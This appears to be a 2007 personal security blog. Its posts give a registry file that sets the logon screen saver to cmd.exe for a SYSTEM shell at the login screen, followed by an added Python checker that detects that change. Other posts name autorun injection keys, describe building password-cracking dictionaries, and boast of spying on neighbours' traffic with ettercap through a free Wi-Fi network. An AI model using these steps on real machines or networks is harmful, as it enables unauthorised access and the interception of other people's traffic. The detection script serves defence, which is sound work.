# Sunday, April 29, 2007

A simple trick to get an elevated command line from the screen saver. There are many ways to enter this data; one fast trick is to use a Linux registry editor. It's as simple as making the logon script the command window. It also works to run a command line of "copy cmd.exe logon.scr". This will work anywhere but on domain controllers not booted in recovery mode. This is preventable with PGP disk encryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

The OEM data you changed:

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"
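
A defensive check for the change described above, as an added example that is not from the original post: it parses a .reg export and reports where the logon screen saver values under HKEY_USERS\.DEFAULT differ from the OEM values listed above. The function names and the sample exports are constructed for illustration.

```python
import re

# Logon-desktop key and OEM values as listed in the post above.
KEY = r"HKEY_USERS\.DEFAULT\Control Panel\Desktop"
BASELINE = {
    "ScreenSaverIsSecure": "0",
    "ScreenSaveTimeOut": "600",
    "ScreenSaveActive": "1",
    "SCRNSAVE.EXE": r"C:\WINDOWS\System32\logon.scr",
}

def parse_reg(text):
    """Return {key: {name: string_value}} from a .reg (Version 5.00) export."""
    keys, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None and line.startswith('"') and line.endswith('"'):
            name, sep, value = line[1:-1].partition('"="')
            if sep:  # string data only; .reg escapes \ and " with a backslash
                current[name.lower()] = re.sub(r"\\(.)", r"\1", value)
    return keys

def audit(text):
    """List (name, actual, reason) for logon screen saver values that look tampered."""
    values = parse_reg(text).get(KEY.lower(), {})
    findings = []
    for name, expected in BASELINE.items():
        actual = values.get(name.lower())
        if actual is not None and actual.lower() != expected.lower():
            findings.append((name, actual, "differs from OEM value"))
    saver = values.get("scrnsave.exe", "")
    if saver and not saver.lower().endswith(".scr"):
        findings.append(("SCRNSAVE.EXE", saver, "screen saver is not a .scr file"))
    return findings

# Constructed exports: MODIFIED carries the changed values from the post, OEM the original ones.
MODIFIED = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"
'''
OEM = MODIFIED.replace('"15"', '"600"').replace('"cmd.exe"', r'"C:\\WINDOWS\\System32\\logon.scr"')

if __name__ == "__main__":
    for finding in audit(MODIFIED):
        print(finding)
```

Exports written by regedit are UTF-16, so decode the file before passing its text to `audit()`. The check looks only at the registry; the "copy cmd.exe logon.scr" variant leaves these values untouched and needs a hash comparison of logon.scr against a known-good copy instead.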

posted on Sunday, April 29, 2007 1:46:29 AM (Pacific Daylight Time, UTC-07:00)

In recent hackings I came across a few other locations where, if you are smart, you can inject autoruns.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

 

posted on Sunday, April 29, 2007 1:40:43 AM (Pacific Daylight Time, UTC-07:00)

So I have never really liked wireless networks; also, if I do have wireless, I like to have free wireless. So today I spent 8 hours working on making a new wireless network with a captive portal. What is this, you ask? You know when you use the Wi-Fi at a hotel and it makes you agree to terms and conditions, and you can't browse until you accept them? That's the idea. I looked all over at like 15 solutions. The main requirements: it had to be free, I didn't want to need 3rd-party services, and I didn't want it to be a Windows application (I don't want to use a loud computer). I happen to have an old firewall from work that the OS was corrupt on, so I went to CompUSA and bought a CF card for 40% off, came home and installed my new OS. I chose to go with http://www.pfsense.org/; it's a spinoff of m0n0wall, which is a very good firewall; however, pfSense has a better polish.

So after digging out an old Netgear I got it all hooked up. Now I have port-level forwarding with packet shaping and VLANs, as well as a firewalled, limited Wi-Fi with captive portal. Way cool. I now offer network service to my neighbors with the added cost of letting me spy on them. All ettercap, I love you. The only interesting thing that I should add is that I'm using an alpha build and it's very buggy but still works.

 

posted on Sunday, April 29, 2007 1:00:30 AM (Pacific Daylight Time, UTC-07:00)
# Monday, April 16, 2007

If you own a PC that the public can get to (laptop, library, corporate, etc.), disable AutoPlay on the system via Group Policy. Do this to prevent hackers

posted on Monday, April 16, 2007 3:48:10 PM (Pacific Daylight Time, UTC-07:00)
I posted a while back about swearing at the automated caller menus; that works a lot. But if not, here is a great site. Keep this handy when you call a major corporation: get a human caller list.
posted on Monday, April 16, 2007 10:24:25 AM (Pacific Daylight Time, UTC-07:00)
# Friday, April 13, 2007
When you just use your website and never look at the server that runs it, it will crash dump because it's overused and write GBs of data to your C: drive, to the point that Windows won't run any more. Then, to make it more fun, RDP won't have any room to cache data. So it's basically a pain to get your server back online. Sorry.
posted on Friday, April 13, 2007 9:09:00 AM (Pacific Daylight Time, UTC-07:00)
# Tuesday, April 03, 2007
I was browsing the FCC database today; the information in this database is insane. Go look up an FCC ID today. Combine it with the Patent Office search and you have all you need to hack things.
posted on Tuesday, April 03, 2007 11:33:27 AM (Pacific Daylight Time, UTC-07:00)
# Tuesday, March 27, 2007

So I wanted to review the permissions of a group of calendars so that all team members can look at others' calendars. This is not only a hard task for an administrator to do individually, but it's also a pain for users: open, click, add, add, add. Most users don't understand permissions, so they have no idea where or what to click. So I set out for a tool to mass edit calendar permissions.

I found one from Microsoft! This is a very powerful tool and not for goofing off; it is very powerful for public folders as well as private ones. It is the Public Folder DAV Admin tool, along with steps that are "not approved", to edit the calendar permissions. You can set the default permissions to review, for example; this will allow a select group or everyone to view everyone's calendar (not that big of a security risk, since you can cheat and use free/busy data to gather the same information), but it increases productivity for users to know what others' calendars look like with the native views in Outlook.

It will also do powerful admin tasks for your public folders and give you some interesting data as well. The Q article has one glitch: it has steps for an older version of the DAV tool. Go to the Tools menu in the tool for the calendar permissions setting, and log in with a domain admin that has Exchange management over the server. My non-domain-admin user didn't work. (Send-as has no bearing on this tool.)

posted on Tuesday, March 27, 2007 3:29:31 PM (Pacific Standard Time, UTC-08:00)
# Thursday, March 22, 2007

I just noticed that I had porn on my website, then I wondered what's up with that. For the first time in about 3 years I have been hit with a virus. Bad Kelly.

google Trojan

In all comical manner, I got this trojan because I got tired of IE7 security and turned it all off. Say haha, everyone.

Nothing will detect it yet (no data on the web at all to clean the virus). I did find it running with HijackThis; it had a DLL with the following information:

"O2 - BHO: (no name) - {598F4775-6FB6-477B-9842-E0426824E077} - C:\DOCUME~1\KELLYK~1\LOCALS~1\Temp\~DP20.dll"

When that DLL is added or removed the porn will come back. However, the trojan appears to still be affecting my computer, or a file on my computer is infected. Fun.

Found a cool site, http://www.virustotal.com; it will scan files with all engines. Looks like that is just an adware file. How did it get there?!

Patch to prevent it: MS06-001



 

posted on Thursday, March 22, 2007 8:18:51 PM (Pacific Standard Time, UTC-08:00)
I can never find a common password and user name dictionary, so I created my own. Simple trick: I researched some viruses and pulled the list of user names and passwords they used. Easy. I found a list of the 100 most used passwords and converted them all to .txt files for use with John the Ripper etc. to create fuzz passwords with. I also went and pulled down the Default Device Password lists and converted them to .txt files so that you can also have them in a list. So it made about 5 text files of passwords that look like nice low-hanging fruit to chomp. You can download my compilation from my blog.
posted on Thursday, March 22, 2007 8:07:52 PM (Pacific Standard Time, UTC-08:00)